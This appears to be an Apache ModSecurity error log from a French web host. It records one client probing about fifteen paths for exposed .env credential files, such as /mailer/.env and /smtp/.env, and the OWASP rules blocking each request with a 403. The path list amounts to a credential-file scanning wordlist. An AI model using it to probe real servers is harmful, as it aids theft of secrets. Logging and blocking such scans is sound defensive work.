[Mon May 11 17:36:24.266862 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup2"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.backup2"] [unique_id "agH3eFV4kyjgo4bQBUhukgAAANM"]
[Mon May 11 17:36:24.267095 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.backup2"] [unique_id "agH3eFV4kyjgo4bQBUhukgAAANM"]
[Mon May 11 17:36:24.267340 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.backup2"] [unique_id "agH3eFV4kyjgo4bQBUhukgAAANM"]
[Mon May 11 17:36:24.482727 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /logs/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/logs/.env"] [unique_id "agH3eFV4kyjgo4bQBUhukwAAANM"]
[Mon May 11 17:36:24.482964 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/logs/.env"] [unique_id "agH3eFV4kyjgo4bQBUhukwAAANM"]
[Mon May 11 17:36:24.483223 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/logs/.env"] [unique_id "agH3eFV4kyjgo4bQBUhukwAAANM"]
[Mon May 11 17:36:24.683492 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cache/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/cache/.env"] [unique_id "agH3eFV4kyjgo4bQBUhulQAAANM"]
[Mon May 11 17:36:24.683731 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/cache/.env"] [unique_id "agH3eFV4kyjgo4bQBUhulQAAANM"]
[Mon May 11 17:36:24.684034 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/cache/.env"] [unique_id "agH3eFV4kyjgo4bQBUhulQAAANM"]
[Mon May 11 17:36:24.876236 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailer/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/mailer/.env"] [unique_id "agH3eFV4kyjgo4bQBUhulgAAANM"]
[Mon May 11 17:36:24.876464 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/mailer/.env"] [unique_id "agH3eFV4kyjgo4bQBUhulgAAANM"]
[Mon May 11 17:36:24.876711 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/mailer/.env"] [unique_id "agH3eFV4kyjgo4bQBUhulgAAANM"]
[Mon May 11 17:36:25.056862 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mail/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/mail/.env"] [unique_id "agH3eVV4kyjgo4bQBUhulwAAANM"]
[Mon May 11 17:36:25.057095 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/mail/.env"] [unique_id "agH3eVV4kyjgo4bQBUhulwAAANM"]
[Mon May 11 17:36:25.057369 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/mail/.env"] [unique_id "agH3eVV4kyjgo4bQBUhulwAAANM"]
[Mon May 11 17:36:25.316682 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /email/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/email/.env"] [unique_id "agH3eVV4kyjgo4bQBUhumAAAANM"]
[Mon May 11 17:36:25.316905 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/email/.env"] [unique_id "agH3eVV4kyjgo4bQBUhumAAAANM"]
[Mon May 11 17:36:25.317151 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/email/.env"] [unique_id "agH3eVV4kyjgo4bQBUhumAAAANM"]
[Mon May 11 17:36:25.507040 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /smtp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/smtp/.env"] [unique_id "agH3eVV4kyjgo4bQBUhumgAAANM"]
[Mon May 11 17:36:25.507288 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/smtp/.env"] [unique_id "agH3eVV4kyjgo4bQBUhumgAAANM"]
[Mon May 11 17:36:25.507568 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/smtp/.env"] [unique_id "agH3eVV4kyjgo4bQBUhumgAAANM"]
[Mon May 11 17:36:25.781488 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailing/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/mailing/.env"] [unique_id "agH3eVV4kyjgo4bQBUhumwAAANM"]
[Mon May 11 17:36:25.781711 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/mailing/.env"] [unique_id "agH3eVV4kyjgo4bQBUhumwAAANM"]
[Mon May 11 17:36:25.781973 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/mailing/.env"] [unique_id "agH3eVV4kyjgo4bQBUhumwAAANM"]
[Mon May 11 17:36:25.948190 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /notifications/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/notifications/.env"] [unique_id "agH3eVV4kyjgo4bQBUhunAAAANM"]
[Mon May 11 17:36:25.948423 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/notifications/.env"] [unique_id "agH3eVV4kyjgo4bQBUhunAAAANM"]
[Mon May 11 17:36:25.948689 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/notifications/.env"] [unique_id "agH3eVV4kyjgo4bQBUhunAAAANM"]
[Mon May 11 17:36:26.041470 2026] [ssl:error] [pid 1411201:tid 1411424] (EAI 2)Name or service not known: [client 37.44.203.252:44761] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 17:36:26.041502 2026] [ssl:error] [pid 1411201:tid 1411424] AH01941: stapling_renew_response: responder error
[Mon May 11 17:36:26.118190 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /notify/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/notify/.env"] [unique_id "agH3elV4kyjgo4bQBUhungAAANM"]
[Mon May 11 17:36:26.118425 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/notify/.env"] [unique_id "agH3elV4kyjgo4bQBUhungAAANM"]
[Mon May 11 17:36:26.118724 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/notify/.env"] [unique_id "agH3elV4kyjgo4bQBUhungAAANM"]
[Mon May 11 17:36:26.343083 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sender/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/sender/.env"] [unique_id "agH3elV4kyjgo4bQBUhunwAAANM"]
[Mon May 11 17:36:26.343317 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/sender/.env"] [unique_id "agH3elV4kyjgo4bQBUhunwAAANM"]
[Mon May 11 17:36:26.343594 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/sender/.env"] [unique_id "agH3elV4kyjgo4bQBUhunwAAANM"]
[Mon May 11 17:36:26.529405 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /campaign/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/campaign/.env"] [unique_id "agH3elV4kyjgo4bQBUhuoAAAANM"]
[Mon May 11 17:36:26.529630 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/campaign/.env"] [unique_id "agH3elV4kyjgo4bQBUhuoAAAANM"]
[Mon May 11 17:36:26.529888 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/campaign/.env"] [unique_id "agH3elV4kyjgo4bQBUhuoAAAANM"]
[Mon May 11 17:36:26.701049 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /newsletter/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/newsletter/.env"] [unique_id "agH3elV4kyjgo4bQBUhuoQAAANM"]
[Mon May 11 17:36:26.701291 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/newsletter/.env"] [unique_id "agH3elV4kyjgo4bQBUhuoQAAANM"]
[Mon May 11 17:36:26.701554 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/newsletter/.env"] [unique_id "agH3elV4kyjgo4bQBUhuoQAAANM"]
